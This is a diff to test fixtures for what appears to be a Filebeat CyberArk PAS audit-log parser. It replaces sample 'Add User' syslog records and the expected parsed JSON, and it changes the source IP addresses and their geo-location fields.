+<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:36</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPApp_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:36</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPGW_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPApp_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:21</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMP_ADB_asr-cyberark-psm-ssh</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log-expected.json
index 9262f4a6fdb6..886fa9558656 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log-expected.json
@@ -9,7 +9,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPApp_localhost.localdomain",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add user",
         "event.category": [
@@ -36,22 +36,19 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMPApp_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -68,7 +65,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPGW_localhost.localdomain",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add user",
         "event.category": [
@@ -88,29 +85,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 581,
+        "log.offset": 580,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMPGW_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -127,7 +121,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMP_ADB_localhost.localdomain",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:35",
         "event.action": "add user",
         "event.category": [
@@ -147,29 +141,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1161,
+        "log.offset": 1159,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMP_ADB_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -186,7 +177,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMApp_VAGRANT",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 09:59:19",
         "event.action": "add user",
         "event.category": [
@@ -206,29 +197,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1743,
+        "log.offset": 1740,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMApp_VAGRANT"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -245,7 +233,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMGw_VAGRANT",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 09:59:27",
         "event.action": "add user",
         "event.category": [
@@ -265,29 +253,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2309,
+        "log.offset": 2305,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMGw_VAGRANT"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -304,7 +289,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMApp_ASR-WIN",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:19:06",
         "event.action": "add user",
         "event.category": [
@@ -324,28 +309,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2874,
+        "log.offset": 2869,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "related.user": [
             "PSMApp_ASR-WIN"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -362,7 +345,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMGw_ASR-WIN",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:19:15",
         "event.action": "add user",
         "event.category": [
@@ -382,28 +365,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3440,
+        "log.offset": 3434,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "related.user": [
             "PSMGw_ASR-WIN"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -417,11 +398,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:36Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add User",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:36</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPApp_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:36</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPApp_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPApp_VAGRANT",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 08:59:36",
         "event.action": "add user",
         "event.category": [
@@ -441,29 +422,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4005,
+        "log.offset": 3998,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMPApp_VAGRANT"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -477,11 +455,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:36Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add User",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:36</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:36</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPGW_VAGRANT",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 08:59:36",
         "event.action": "add user",
         "event.category": [
@@ -501,29 +479,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5419,
+        "log.offset": 5410,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "PSMPGW_VAGRANT"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -537,11 +512,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:16Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add User",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPGW_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPGW_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
